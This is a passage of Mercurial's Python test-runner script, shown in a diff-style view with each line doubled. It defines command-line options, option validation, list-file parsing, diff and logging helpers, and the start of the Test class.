327 'port': ('HGTEST_PORT', 20059),
328 'shell': ('HGTEST_SHELL', 'sh'),
328 'shell': ('HGTEST_SHELL', 'sh'),
329 }
329 }
330
330
331
331
332 def canonpath(path):
332 def canonpath(path):
333 return os.path.realpath(os.path.expanduser(path))
333 return os.path.realpath(os.path.expanduser(path))
334
334
335
335
336 def parselistfiles(files, listtype, warn=True):
336 def parselistfiles(files, listtype, warn=True):
337 entries = dict()
337 entries = dict()
338 for filename in files:
338 for filename in files:
339 try:
339 try:
340 path = os.path.expanduser(os.path.expandvars(filename))
340 path = os.path.expanduser(os.path.expandvars(filename))
341 f = open(path, "rb")
341 f = open(path, "rb")
342 except IOError as err:
342 except IOError as err:
343 if err.errno != errno.ENOENT:
343 if err.errno != errno.ENOENT:
344 raise
344 raise
345 if warn:
345 if warn:
346 print("warning: no such %s file: %s" % (listtype, filename))
346 print("warning: no such %s file: %s" % (listtype, filename))
347 continue
347 continue
348
348
349 for line in f.readlines():
349 for line in f.readlines():
350 line = line.split(b'#', 1)[0].strip()
350 line = line.split(b'#', 1)[0].strip()
351 if line:
351 if line:
352 entries[line] = filename
352 entries[line] = filename
353
353
354 f.close()
354 f.close()
355 return entries
355 return entries
356
356
357
357
358 def parsettestcases(path):
358 def parsettestcases(path):
359 """read a .t test file, return a set of test case names
359 """read a .t test file, return a set of test case names
360
360
361 If path does not exist, return an empty set.
361 If path does not exist, return an empty set.
362 """
362 """
363 cases = []
363 cases = []
364 try:
364 try:
365 with open(path, 'rb') as f:
365 with open(path, 'rb') as f:
366 for l in f:
366 for l in f:
367 if l.startswith(b'#testcases '):
367 if l.startswith(b'#testcases '):
368 cases.append(sorted(l[11:].split()))
368 cases.append(sorted(l[11:].split()))
369 except IOError as ex:
369 except IOError as ex:
370 if ex.errno != errno.ENOENT:
370 if ex.errno != errno.ENOENT:
371 raise
371 raise
372 return cases
372 return cases
373
373
374
374
375 def getparser():
375 def getparser():
376 """Obtain the OptionParser used by the CLI."""
376 """Obtain the OptionParser used by the CLI."""
377 parser = argparse.ArgumentParser(usage='%(prog)s [options] [tests]')
377 parser = argparse.ArgumentParser(usage='%(prog)s [options] [tests]')
378
378
379 selection = parser.add_argument_group('Test Selection')
379 selection = parser.add_argument_group('Test Selection')
380 selection.add_argument(
380 selection.add_argument(
381 '--allow-slow-tests',
381 '--allow-slow-tests',
382 action='store_true',
382 action='store_true',
383 help='allow extremely slow tests',
383 help='allow extremely slow tests',
384 )
384 )
385 selection.add_argument(
385 selection.add_argument(
386 "--blacklist",
386 "--blacklist",
387 action="append",
387 action="append",
388 help="skip tests listed in the specified blacklist file",
388 help="skip tests listed in the specified blacklist file",
389 )
389 )
390 selection.add_argument(
390 selection.add_argument(
391 "--changed",
391 "--changed",
392 help="run tests that are changed in parent rev or working directory",
392 help="run tests that are changed in parent rev or working directory",
393 )
393 )
394 selection.add_argument(
394 selection.add_argument(
395 "-k", "--keywords", help="run tests matching keywords"
395 "-k", "--keywords", help="run tests matching keywords"
396 )
396 )
397 selection.add_argument(
397 selection.add_argument(
398 "-r", "--retest", action="store_true", help="retest failed tests"
398 "-r", "--retest", action="store_true", help="retest failed tests"
399 )
399 )
400 selection.add_argument(
400 selection.add_argument(
401 "--test-list",
401 "--test-list",
402 action="append",
402 action="append",
403 help="read tests to run from the specified file",
403 help="read tests to run from the specified file",
404 )
404 )
405 selection.add_argument(
405 selection.add_argument(
406 "--whitelist",
406 "--whitelist",
407 action="append",
407 action="append",
408 help="always run tests listed in the specified whitelist file",
408 help="always run tests listed in the specified whitelist file",
409 )
409 )
410 selection.add_argument(
410 selection.add_argument(
411 'tests', metavar='TESTS', nargs='*', help='Tests to run'
411 'tests', metavar='TESTS', nargs='*', help='Tests to run'
412 )
412 )
413
413
414 harness = parser.add_argument_group('Test Harness Behavior')
414 harness = parser.add_argument_group('Test Harness Behavior')
415 harness.add_argument(
415 harness.add_argument(
416 '--bisect-repo',
416 '--bisect-repo',
417 metavar='bisect_repo',
417 metavar='bisect_repo',
418 help=(
418 help=(
419 "Path of a repo to bisect. Use together with " "--known-good-rev"
419 "Path of a repo to bisect. Use together with " "--known-good-rev"
420 ),
420 ),
421 )
421 )
422 harness.add_argument(
422 harness.add_argument(
423 "-d",
423 "-d",
424 "--debug",
424 "--debug",
425 action="store_true",
425 action="store_true",
426 help="debug mode: write output of test scripts to console"
426 help="debug mode: write output of test scripts to console"
427 " rather than capturing and diffing it (disables timeout)",
427 " rather than capturing and diffing it (disables timeout)",
428 )
428 )
429 harness.add_argument(
429 harness.add_argument(
430 "-f",
430 "-f",
431 "--first",
431 "--first",
432 action="store_true",
432 action="store_true",
433 help="exit on the first test failure",
433 help="exit on the first test failure",
434 )
434 )
435 harness.add_argument(
435 harness.add_argument(
436 "-i",
436 "-i",
437 "--interactive",
437 "--interactive",
438 action="store_true",
438 action="store_true",
439 help="prompt to accept changed output",
439 help="prompt to accept changed output",
440 )
440 )
441 harness.add_argument(
441 harness.add_argument(
442 "-j",
442 "-j",
443 "--jobs",
443 "--jobs",
444 type=int,
444 type=int,
445 help="number of jobs to run in parallel"
445 help="number of jobs to run in parallel"
446 " (default: $%s or %d)" % defaults['jobs'],
446 " (default: $%s or %d)" % defaults['jobs'],
447 )
447 )
448 harness.add_argument(
448 harness.add_argument(
449 "--keep-tmpdir",
449 "--keep-tmpdir",
450 action="store_true",
450 action="store_true",
451 help="keep temporary directory after running tests",
451 help="keep temporary directory after running tests",
452 )
452 )
453 harness.add_argument(
453 harness.add_argument(
454 '--known-good-rev',
454 '--known-good-rev',
455 metavar="known_good_rev",
455 metavar="known_good_rev",
456 help=(
456 help=(
457 "Automatically bisect any failures using this "
457 "Automatically bisect any failures using this "
458 "revision as a known-good revision."
458 "revision as a known-good revision."
459 ),
459 ),
460 )
460 )
461 harness.add_argument(
461 harness.add_argument(
462 "--list-tests",
462 "--list-tests",
463 action="store_true",
463 action="store_true",
464 help="list tests instead of running them",
464 help="list tests instead of running them",
465 )
465 )
466 harness.add_argument(
466 harness.add_argument(
467 "--loop", action="store_true", help="loop tests repeatedly"
467 "--loop", action="store_true", help="loop tests repeatedly"
468 )
468 )
469 harness.add_argument(
469 harness.add_argument(
470 '--random', action="store_true", help='run tests in random order'
470 '--random', action="store_true", help='run tests in random order'
471 )
471 )
472 harness.add_argument(
472 harness.add_argument(
473 '--order-by-runtime',
473 '--order-by-runtime',
474 action="store_true",
474 action="store_true",
475 help='run slowest tests first, according to .testtimes',
475 help='run slowest tests first, according to .testtimes',
476 )
476 )
477 harness.add_argument(
477 harness.add_argument(
478 "-p",
478 "-p",
479 "--port",
479 "--port",
480 type=int,
480 type=int,
481 help="port on which servers should listen"
481 help="port on which servers should listen"
482 " (default: $%s or %d)" % defaults['port'],
482 " (default: $%s or %d)" % defaults['port'],
483 )
483 )
484 harness.add_argument(
484 harness.add_argument(
485 '--profile-runner',
485 '--profile-runner',
486 action='store_true',
486 action='store_true',
487 help='run statprof on run-tests',
487 help='run statprof on run-tests',
488 )
488 )
489 harness.add_argument(
489 harness.add_argument(
490 "-R", "--restart", action="store_true", help="restart at last error"
490 "-R", "--restart", action="store_true", help="restart at last error"
491 )
491 )
492 harness.add_argument(
492 harness.add_argument(
493 "--runs-per-test",
493 "--runs-per-test",
494 type=int,
494 type=int,
495 dest="runs_per_test",
495 dest="runs_per_test",
496 help="run each test N times (default=1)",
496 help="run each test N times (default=1)",
497 default=1,
497 default=1,
498 )
498 )
499 harness.add_argument(
499 harness.add_argument(
500 "--shell", help="shell to use (default: $%s or %s)" % defaults['shell']
500 "--shell", help="shell to use (default: $%s or %s)" % defaults['shell']
501 )
501 )
502 harness.add_argument(
502 harness.add_argument(
503 '--showchannels', action='store_true', help='show scheduling channels'
503 '--showchannels', action='store_true', help='show scheduling channels'
504 )
504 )
505 harness.add_argument(
505 harness.add_argument(
506 "--slowtimeout",
506 "--slowtimeout",
507 type=int,
507 type=int,
508 help="kill errant slow tests after SLOWTIMEOUT seconds"
508 help="kill errant slow tests after SLOWTIMEOUT seconds"
509 " (default: $%s or %d)" % defaults['slowtimeout'],
509 " (default: $%s or %d)" % defaults['slowtimeout'],
510 )
510 )
511 harness.add_argument(
511 harness.add_argument(
512 "-t",
512 "-t",
513 "--timeout",
513 "--timeout",
514 type=int,
514 type=int,
515 help="kill errant tests after TIMEOUT seconds"
515 help="kill errant tests after TIMEOUT seconds"
516 " (default: $%s or %d)" % defaults['timeout'],
516 " (default: $%s or %d)" % defaults['timeout'],
517 )
517 )
518 harness.add_argument(
518 harness.add_argument(
519 "--tmpdir",
519 "--tmpdir",
520 help="run tests in the given temporary directory"
520 help="run tests in the given temporary directory"
521 " (implies --keep-tmpdir)",
521 " (implies --keep-tmpdir)",
522 )
522 )
523 harness.add_argument(
523 harness.add_argument(
524 "-v", "--verbose", action="store_true", help="output verbose messages"
524 "-v", "--verbose", action="store_true", help="output verbose messages"
525 )
525 )
526
526
527 hgconf = parser.add_argument_group('Mercurial Configuration')
527 hgconf = parser.add_argument_group('Mercurial Configuration')
528 hgconf.add_argument(
528 hgconf.add_argument(
529 "--chg",
529 "--chg",
530 action="store_true",
530 action="store_true",
531 help="install and use chg wrapper in place of hg",
531 help="install and use chg wrapper in place of hg",
532 )
532 )
533 hgconf.add_argument("--compiler", help="compiler to build with")
533 hgconf.add_argument("--compiler", help="compiler to build with")
534 hgconf.add_argument(
534 hgconf.add_argument(
535 '--extra-config-opt',
535 '--extra-config-opt',
536 action="append",
536 action="append",
537 default=[],
537 default=[],
538 help='set the given config opt in the test hgrc',
538 help='set the given config opt in the test hgrc',
539 )
539 )
540 hgconf.add_argument(
540 hgconf.add_argument(
541 "-l",
541 "-l",
542 "--local",
542 "--local",
543 action="store_true",
543 action="store_true",
544 help="shortcut for --with-hg=<testdir>/../hg, "
544 help="shortcut for --with-hg=<testdir>/../hg, "
545 "and --with-chg=<testdir>/../contrib/chg/chg if --chg is set",
545 "and --with-chg=<testdir>/../contrib/chg/chg if --chg is set",
546 )
546 )
547 hgconf.add_argument(
547 hgconf.add_argument(
548 "--ipv6",
548 "--ipv6",
549 action="store_true",
549 action="store_true",
550 help="prefer IPv6 to IPv4 for network related tests",
550 help="prefer IPv6 to IPv4 for network related tests",
551 )
551 )
552 hgconf.add_argument(
552 hgconf.add_argument(
553 "--pure",
553 "--pure",
554 action="store_true",
554 action="store_true",
555 help="use pure Python code instead of C extensions",
555 help="use pure Python code instead of C extensions",
556 )
556 )
557 hgconf.add_argument(
557 hgconf.add_argument(
558 "-3",
558 "-3",
559 "--py3-warnings",
559 "--py3-warnings",
560 action="store_true",
560 action="store_true",
561 help="enable Py3k warnings on Python 2.7+",
561 help="enable Py3k warnings on Python 2.7+",
562 )
562 )
563 hgconf.add_argument(
563 hgconf.add_argument(
564 "--with-chg",
564 "--with-chg",
565 metavar="CHG",
565 metavar="CHG",
566 help="use specified chg wrapper in place of hg",
566 help="use specified chg wrapper in place of hg",
567 )
567 )
568 hgconf.add_argument(
568 hgconf.add_argument(
569 "--with-hg",
569 "--with-hg",
570 metavar="HG",
570 metavar="HG",
571 help="test using specified hg script rather than a "
571 help="test using specified hg script rather than a "
572 "temporary installation",
572 "temporary installation",
573 )
573 )
574
574
575 reporting = parser.add_argument_group('Results Reporting')
575 reporting = parser.add_argument_group('Results Reporting')
576 reporting.add_argument(
576 reporting.add_argument(
577 "-C",
577 "-C",
578 "--annotate",
578 "--annotate",
579 action="store_true",
579 action="store_true",
580 help="output files annotated with coverage",
580 help="output files annotated with coverage",
581 )
581 )
582 reporting.add_argument(
582 reporting.add_argument(
583 "--color",
583 "--color",
584 choices=["always", "auto", "never"],
584 choices=["always", "auto", "never"],
585 default=os.environ.get('HGRUNTESTSCOLOR', 'auto'),
585 default=os.environ.get('HGRUNTESTSCOLOR', 'auto'),
586 help="colorisation: always|auto|never (default: auto)",
586 help="colorisation: always|auto|never (default: auto)",
587 )
587 )
588 reporting.add_argument(
588 reporting.add_argument(
589 "-c",
589 "-c",
590 "--cover",
590 "--cover",
591 action="store_true",
591 action="store_true",
592 help="print a test coverage report",
592 help="print a test coverage report",
593 )
593 )
594 reporting.add_argument(
594 reporting.add_argument(
595 '--exceptions',
595 '--exceptions',
596 action='store_true',
596 action='store_true',
597 help='log all exceptions and generate an exception report',
597 help='log all exceptions and generate an exception report',
598 )
598 )
599 reporting.add_argument(
599 reporting.add_argument(
600 "-H",
600 "-H",
601 "--htmlcov",
601 "--htmlcov",
602 action="store_true",
602 action="store_true",
603 help="create an HTML report of the coverage of the files",
603 help="create an HTML report of the coverage of the files",
604 )
604 )
605 reporting.add_argument(
605 reporting.add_argument(
606 "--json",
606 "--json",
607 action="store_true",
607 action="store_true",
608 help="store test result data in 'report.json' file",
608 help="store test result data in 'report.json' file",
609 )
609 )
610 reporting.add_argument(
610 reporting.add_argument(
611 "--outputdir",
611 "--outputdir",
612 help="directory to write error logs to (default=test directory)",
612 help="directory to write error logs to (default=test directory)",
613 )
613 )
614 reporting.add_argument(
614 reporting.add_argument(
615 "-n", "--nodiff", action="store_true", help="skip showing test changes"
615 "-n", "--nodiff", action="store_true", help="skip showing test changes"
616 )
616 )
617 reporting.add_argument(
617 reporting.add_argument(
618 "-S",
618 "-S",
619 "--noskips",
619 "--noskips",
620 action="store_true",
620 action="store_true",
621 help="don't report skip tests verbosely",
621 help="don't report skip tests verbosely",
622 )
622 )
623 reporting.add_argument(
623 reporting.add_argument(
624 "--time", action="store_true", help="time how long each test takes"
624 "--time", action="store_true", help="time how long each test takes"
625 )
625 )
626 reporting.add_argument("--view", help="external diff viewer")
626 reporting.add_argument("--view", help="external diff viewer")
627 reporting.add_argument(
627 reporting.add_argument(
628 "--xunit", help="record xunit results at specified path"
628 "--xunit", help="record xunit results at specified path"
629 )
629 )
630
630
631 for option, (envvar, default) in defaults.items():
631 for option, (envvar, default) in defaults.items():
632 defaults[option] = type(default)(os.environ.get(envvar, default))
632 defaults[option] = type(default)(os.environ.get(envvar, default))
633 parser.set_defaults(**defaults)
633 parser.set_defaults(**defaults)
634
634
635 return parser
635 return parser
636
636
637
637
638 def parseargs(args, parser):
638 def parseargs(args, parser):
639 """Parse arguments with our OptionParser and validate results."""
639 """Parse arguments with our OptionParser and validate results."""
640 options = parser.parse_args(args)
640 options = parser.parse_args(args)
641
641
642 # jython is always pure
642 # jython is always pure
643 if 'java' in sys.platform or '__pypy__' in sys.modules:
643 if 'java' in sys.platform or '__pypy__' in sys.modules:
644 options.pure = True
644 options.pure = True
645
645
646 if options.local:
646 if options.local:
647 if options.with_hg or options.with_chg:
647 if options.with_hg or options.with_chg:
648 parser.error('--local cannot be used with --with-hg or --with-chg')
648 parser.error('--local cannot be used with --with-hg or --with-chg')
649 testdir = os.path.dirname(_bytespath(canonpath(sys.argv[0])))
649 testdir = os.path.dirname(_bytespath(canonpath(sys.argv[0])))
650 reporootdir = os.path.dirname(testdir)
650 reporootdir = os.path.dirname(testdir)
651 pathandattrs = [(b'hg', 'with_hg')]
651 pathandattrs = [(b'hg', 'with_hg')]
652 if options.chg:
652 if options.chg:
653 pathandattrs.append((b'contrib/chg/chg', 'with_chg'))
653 pathandattrs.append((b'contrib/chg/chg', 'with_chg'))
654 for relpath, attr in pathandattrs:
654 for relpath, attr in pathandattrs:
655 binpath = os.path.join(reporootdir, relpath)
655 binpath = os.path.join(reporootdir, relpath)
656 if os.name != 'nt' and not os.access(binpath, os.X_OK):
656 if os.name != 'nt' and not os.access(binpath, os.X_OK):
657 parser.error(
657 parser.error(
658 '--local specified, but %r not found or '
658 '--local specified, but %r not found or '
659 'not executable' % binpath
659 'not executable' % binpath
660 )
660 )
661 setattr(options, attr, _strpath(binpath))
661 setattr(options, attr, _strpath(binpath))
662
662
663 if options.with_hg:
663 if options.with_hg:
664 options.with_hg = canonpath(_bytespath(options.with_hg))
664 options.with_hg = canonpath(_bytespath(options.with_hg))
665 if not (
665 if not (
666 os.path.isfile(options.with_hg)
666 os.path.isfile(options.with_hg)
667 and os.access(options.with_hg, os.X_OK)
667 and os.access(options.with_hg, os.X_OK)
668 ):
668 ):
669 parser.error('--with-hg must specify an executable hg script')
669 parser.error('--with-hg must specify an executable hg script')
670 if os.path.basename(options.with_hg) not in [b'hg', b'hg.exe']:
670 if os.path.basename(options.with_hg) not in [b'hg', b'hg.exe']:
671 sys.stderr.write('warning: --with-hg should specify an hg script\n')
671 sys.stderr.write('warning: --with-hg should specify an hg script\n')
672 sys.stderr.flush()
672 sys.stderr.flush()
673
673
674 if (options.chg or options.with_chg) and os.name == 'nt':
674 if (options.chg or options.with_chg) and os.name == 'nt':
675 parser.error('chg does not work on %s' % os.name)
675 parser.error('chg does not work on %s' % os.name)
676 if options.with_chg:
676 if options.with_chg:
677 options.chg = False # no installation to temporary location
677 options.chg = False # no installation to temporary location
678 options.with_chg = canonpath(_bytespath(options.with_chg))
678 options.with_chg = canonpath(_bytespath(options.with_chg))
679 if not (
679 if not (
680 os.path.isfile(options.with_chg)
680 os.path.isfile(options.with_chg)
681 and os.access(options.with_chg, os.X_OK)
681 and os.access(options.with_chg, os.X_OK)
682 ):
682 ):
683 parser.error('--with-chg must specify a chg executable')
683 parser.error('--with-chg must specify a chg executable')
684 if options.chg and options.with_hg:
684 if options.chg and options.with_hg:
685 # chg shares installation location with hg
685 # chg shares installation location with hg
686 parser.error(
686 parser.error(
687 '--chg does not work when --with-hg is specified '
687 '--chg does not work when --with-hg is specified '
688 '(use --with-chg instead)'
688 '(use --with-chg instead)'
689 )
689 )
690
690
691 if options.color == 'always' and not pygmentspresent:
691 if options.color == 'always' and not pygmentspresent:
692 sys.stderr.write(
692 sys.stderr.write(
693 'warning: --color=always ignored because '
693 'warning: --color=always ignored because '
694 'pygments is not installed\n'
694 'pygments is not installed\n'
695 )
695 )
696
696
697 if options.bisect_repo and not options.known_good_rev:
697 if options.bisect_repo and not options.known_good_rev:
698 parser.error("--bisect-repo cannot be used without --known-good-rev")
698 parser.error("--bisect-repo cannot be used without --known-good-rev")
699
699
700 global useipv6
700 global useipv6
701 if options.ipv6:
701 if options.ipv6:
702 useipv6 = checksocketfamily('AF_INET6')
702 useipv6 = checksocketfamily('AF_INET6')
703 else:
703 else:
704 # only use IPv6 if IPv4 is unavailable and IPv6 is available
704 # only use IPv6 if IPv4 is unavailable and IPv6 is available
705 useipv6 = (not checksocketfamily('AF_INET')) and checksocketfamily(
705 useipv6 = (not checksocketfamily('AF_INET')) and checksocketfamily(
706 'AF_INET6'
706 'AF_INET6'
707 )
707 )
708
708
709 options.anycoverage = options.cover or options.annotate or options.htmlcov
709 options.anycoverage = options.cover or options.annotate or options.htmlcov
710 if options.anycoverage:
710 if options.anycoverage:
711 try:
711 try:
712 import coverage
712 import coverage
713
713
714 covver = version.StrictVersion(coverage.__version__).version
714 covver = version.StrictVersion(coverage.__version__).version
715 if covver < (3, 3):
715 if covver < (3, 3):
716 parser.error('coverage options require coverage 3.3 or later')
716 parser.error('coverage options require coverage 3.3 or later')
717 except ImportError:
717 except ImportError:
718 parser.error('coverage options now require the coverage package')
718 parser.error('coverage options now require the coverage package')
719
719
720 if options.anycoverage and options.local:
720 if options.anycoverage and options.local:
721 # this needs some path mangling somewhere, I guess
721 # this needs some path mangling somewhere, I guess
722 parser.error(
722 parser.error(
723 "sorry, coverage options do not work when --local " "is specified"
723 "sorry, coverage options do not work when --local " "is specified"
724 )
724 )
725
725
726 if options.anycoverage and options.with_hg:
726 if options.anycoverage and options.with_hg:
727 parser.error(
727 parser.error(
728 "sorry, coverage options do not work when --with-hg " "is specified"
728 "sorry, coverage options do not work when --with-hg " "is specified"
729 )
729 )
730
730
731 global verbose
731 global verbose
732 if options.verbose:
732 if options.verbose:
733 verbose = ''
733 verbose = ''
734
734
735 if options.tmpdir:
735 if options.tmpdir:
736 options.tmpdir = canonpath(options.tmpdir)
736 options.tmpdir = canonpath(options.tmpdir)
737
737
738 if options.jobs < 1:
738 if options.jobs < 1:
739 parser.error('--jobs must be positive')
739 parser.error('--jobs must be positive')
740 if options.interactive and options.debug:
740 if options.interactive and options.debug:
741 parser.error("-i/--interactive and -d/--debug are incompatible")
741 parser.error("-i/--interactive and -d/--debug are incompatible")
742 if options.debug:
742 if options.debug:
743 if options.timeout != defaults['timeout']:
743 if options.timeout != defaults['timeout']:
744 sys.stderr.write('warning: --timeout option ignored with --debug\n')
744 sys.stderr.write('warning: --timeout option ignored with --debug\n')
745 if options.slowtimeout != defaults['slowtimeout']:
745 if options.slowtimeout != defaults['slowtimeout']:
746 sys.stderr.write(
746 sys.stderr.write(
747 'warning: --slowtimeout option ignored with --debug\n'
747 'warning: --slowtimeout option ignored with --debug\n'
748 )
748 )
749 options.timeout = 0
749 options.timeout = 0
750 options.slowtimeout = 0
750 options.slowtimeout = 0
751 if options.py3_warnings:
751 if options.py3_warnings:
752 if PYTHON3:
752 if PYTHON3:
753 parser.error('--py3-warnings can only be used on Python 2.7')
753 parser.error('--py3-warnings can only be used on Python 2.7')
754
754
755 if options.blacklist:
755 if options.blacklist:
756 options.blacklist = parselistfiles(options.blacklist, 'blacklist')
756 options.blacklist = parselistfiles(options.blacklist, 'blacklist')
757 if options.whitelist:
757 if options.whitelist:
758 options.whitelisted = parselistfiles(options.whitelist, 'whitelist')
758 options.whitelisted = parselistfiles(options.whitelist, 'whitelist')
759 else:
759 else:
760 options.whitelisted = {}
760 options.whitelisted = {}
761
761
762 if options.showchannels:
762 if options.showchannels:
763 options.nodiff = True
763 options.nodiff = True
764
764
765 return options
765 return options
766
766
767
767
768 def rename(src, dst):
768 def rename(src, dst):
769 """Like os.rename(), trade atomicity and opened files friendliness
769 """Like os.rename(), trade atomicity and opened files friendliness
770 for existing destination support.
770 for existing destination support.
771 """
771 """
772 shutil.copy(src, dst)
772 shutil.copy(src, dst)
773 os.remove(src)
773 os.remove(src)
774
774
775
775
776 def makecleanable(path):
776 def makecleanable(path):
777 """Try to fix directory permission recursively so that the entire tree
777 """Try to fix directory permission recursively so that the entire tree
778 can be deleted"""
778 can be deleted"""
779 for dirpath, dirnames, _filenames in os.walk(path, topdown=True):
779 for dirpath, dirnames, _filenames in os.walk(path, topdown=True):
780 for d in dirnames:
780 for d in dirnames:
781 p = os.path.join(dirpath, d)
781 p = os.path.join(dirpath, d)
782 try:
782 try:
783 os.chmod(p, os.stat(p).st_mode & 0o777 | 0o700) # chmod u+rwx
783 os.chmod(p, os.stat(p).st_mode & 0o777 | 0o700) # chmod u+rwx
784 except OSError:
784 except OSError:
785 pass
785 pass
786
786
787
787
788 _unified_diff = difflib.unified_diff
788 _unified_diff = difflib.unified_diff
789 if PYTHON3:
789 if PYTHON3:
790 import functools
790 import functools
791
791
792 _unified_diff = functools.partial(difflib.diff_bytes, difflib.unified_diff)
792 _unified_diff = functools.partial(difflib.diff_bytes, difflib.unified_diff)
793
793
794
794
795 def getdiff(expected, output, ref, err):
795 def getdiff(expected, output, ref, err):
796 servefail = False
796 servefail = False
797 lines = []
797 lines = []
798 for line in _unified_diff(expected, output, ref, err):
798 for line in _unified_diff(expected, output, ref, err):
799 if line.startswith(b'+++') or line.startswith(b'---'):
799 if line.startswith(b'+++') or line.startswith(b'---'):
800 line = line.replace(b'\\', b'/')
800 line = line.replace(b'\\', b'/')
801 if line.endswith(b' \n'):
801 if line.endswith(b' \n'):
802 line = line[:-2] + b'\n'
802 line = line[:-2] + b'\n'
803 lines.append(line)
803 lines.append(line)
804 if not servefail and line.startswith(
804 if not servefail and line.startswith(
805 b'+ abort: child process failed to start'
805 b'+ abort: child process failed to start'
806 ):
806 ):
807 servefail = True
807 servefail = True
808
808
809 return servefail, lines
809 return servefail, lines
810
810
811
811
812 verbose = False
812 verbose = False
813
813
814
814
815 def vlog(*msg):
815 def vlog(*msg):
816 """Log only when in verbose mode."""
816 """Log only when in verbose mode."""
817 if verbose is False:
817 if verbose is False:
818 return
818 return
819
819
820 return log(*msg)
820 return log(*msg)
821
821
822
822
823 # Bytes that break XML even in a CDATA block: control characters 0-31
823 # Bytes that break XML even in a CDATA block: control characters 0-31
824 # sans \t, \n and \r
824 # sans \t, \n and \r
825 CDATA_EVIL = re.compile(br"[\000-\010\013\014\016-\037]")
825 CDATA_EVIL = re.compile(br"[\000-\010\013\014\016-\037]")
826
826
827 # Match feature conditionalized output lines in the form, capturing the feature
827 # Match feature conditionalized output lines in the form, capturing the feature
828 # list in group 2, and the preceeding line output in group 1:
828 # list in group 2, and the preceeding line output in group 1:
829 #
829 #
830 # output..output (feature !)\n
830 # output..output (feature !)\n
831 optline = re.compile(br'(.*) \((.+?) !\)\n$')
831 optline = re.compile(br'(.*) \((.+?) !\)\n$')
832
832
833
833
834 def cdatasafe(data):
834 def cdatasafe(data):
835 """Make a string safe to include in a CDATA block.
835 """Make a string safe to include in a CDATA block.
836
836
837 Certain control characters are illegal in a CDATA block, and
837 Certain control characters are illegal in a CDATA block, and
838 there's no way to include a ]]> in a CDATA either. This function
838 there's no way to include a ]]> in a CDATA either. This function
839 replaces illegal bytes with ? and adds a space between the ]] so
839 replaces illegal bytes with ? and adds a space between the ]] so
840 that it won't break the CDATA block.
840 that it won't break the CDATA block.
841 """
841 """
842 return CDATA_EVIL.sub(b'?', data).replace(b']]>', b'] ]>')
842 return CDATA_EVIL.sub(b'?', data).replace(b']]>', b'] ]>')
843
843
844
844
845 def log(*msg):
845 def log(*msg):
846 """Log something to stdout.
846 """Log something to stdout.
847
847
848 Arguments are strings to print.
848 Arguments are strings to print.
849 """
849 """
850 with iolock:
850 with iolock:
851 if verbose:
851 if verbose:
852 print(verbose, end=' ')
852 print(verbose, end=' ')
853 for m in msg:
853 for m in msg:
854 print(m, end=' ')
854 print(m, end=' ')
855 print()
855 print()
856 sys.stdout.flush()
856 sys.stdout.flush()
857
857
858
858
859 def highlightdiff(line, color):
859 def highlightdiff(line, color):
860 if not color:
860 if not color:
861 return line
861 return line
862 assert pygmentspresent
862 assert pygmentspresent
863 return pygments.highlight(
863 return pygments.highlight(
864 line.decode('latin1'), difflexer, terminal256formatter
864 line.decode('latin1'), difflexer, terminal256formatter
865 ).encode('latin1')
865 ).encode('latin1')
866
866
867
867
868 def highlightmsg(msg, color):
868 def highlightmsg(msg, color):
869 if not color:
869 if not color:
870 return msg
870 return msg
871 assert pygmentspresent
871 assert pygmentspresent
872 return pygments.highlight(msg, runnerlexer, runnerformatter)
872 return pygments.highlight(msg, runnerlexer, runnerformatter)
873
873
874
874
875 def terminate(proc):
875 def terminate(proc):
876 """Terminate subprocess"""
876 """Terminate subprocess"""
877 vlog('# Terminating process %d' % proc.pid)
877 vlog('# Terminating process %d' % proc.pid)
878 try:
878 try:
879 proc.terminate()
879 proc.terminate()
880 except OSError:
880 except OSError:
881 pass
881 pass
882
882
883
883
884 def killdaemons(pidfile):
884 def killdaemons(pidfile):
885 import killdaemons as killmod
885 import killdaemons as killmod
886
886
887 return killmod.killdaemons(pidfile, tryhard=False, remove=True, logfn=vlog)
887 return killmod.killdaemons(pidfile, tryhard=False, remove=True, logfn=vlog)
888
888
889
889
890 class Test(unittest.TestCase):
890 class Test(unittest.TestCase):
891 """Encapsulates a single, runnable test.
891 """Encapsulates a single, runnable test.
892
892
893 While this class conforms to the unittest.TestCase API, it differs in that
893 While this class conforms to the unittest.TestCase API, it differs in that
894 instances need to be instantiated manually. (Typically, unittest.TestCase
894 instances need to be instantiated manually. (Typically, unittest.TestCase
895 classes are instantiated automatically by scanning modules.)
895 classes are instantiated automatically by scanning modules.)
896 """
896 """
897
897
898 # Status code reserved for skipped tests (used by hghave).
898 # Status code reserved for skipped tests (used by hghave).
899 SKIPPED_STATUS = 80
899 SKIPPED_STATUS = 80
900
900
901 def __init__(
901 def __init__(
902 self,
902 self,
903 path,
903 path,
904 outputdir,
904 outputdir,
905 tmpdir,
905 tmpdir,
906 keeptmpdir=False,
906 keeptmpdir=False,
907 debug=False,
907 debug=False,
908 first=False,
908 first=False,
909 timeout=None,
909 timeout=None,
910 startport=None,
910 startport=None,
911 extraconfigopts=None,
911 extraconfigopts=None,
912 py3warnings=False,
912 py3warnings=False,
913 shell=None,
913 shell=None,
914 hgcommand=None,
914 hgcommand=None,
915 slowtimeout=None,
915 slowtimeout=None,
916 usechg=False,
916 usechg=False,
917 useipv6=False,
917 useipv6=False,
918 ):
918 ):
919 """Create a test from parameters.
919 """Create a test from parameters.
920
920
921 path is the full path to the file defining the test.
921 path is the full path to the file defining the test.
922
922
923 tmpdir is the main temporary directory to use for this test.
923 tmpdir is the main temporary directory to use for this test.
924
924
925 keeptmpdir determines whether to keep the test's temporary directory
925 keeptmpdir determines whether to keep the test's temporary directory
926 after execution. It defaults to removal (False).
926 after execution. It defaults to removal (False).
927
927
928 debug mode will make the test execute verbosely, with unfiltered
928 debug mode will make the test execute verbosely, with unfiltered
929 output.
929 output.
930
930
931 timeout controls the maximum run time of the test. It is ignored when
931 timeout controls the maximum run time of the test. It is ignored when
932 debug is True. See slowtimeout for tests with #require slow.
932 debug is True. See slowtimeout for tests with #require slow.
933
933
934 slowtimeout overrides timeout if the test has #require slow.
934 slowtimeout overrides timeout if the test has #require slow.
935
935
936 startport controls the starting port number to use for this test. Each
936 startport controls the starting port number to use for this test. Each
937 test will reserve 3 port numbers for execution. It is the caller's
937 test will reserve 3 port numbers for execution. It is the caller's
938 responsibility to allocate a non-overlapping port range to Test
938 responsibility to allocate a non-overlapping port range to Test
939 instances.
939 instances.
940
940
941 extraconfigopts is an iterable of extra hgrc config options. Values
941 extraconfigopts is an iterable of extra hgrc config options. Values
942 must have the form "key=value" (something understood by hgrc). Values
942 must have the form "key=value" (something understood by hgrc). Values
943 of the form "foo.key=value" will result in "[foo] key=value".
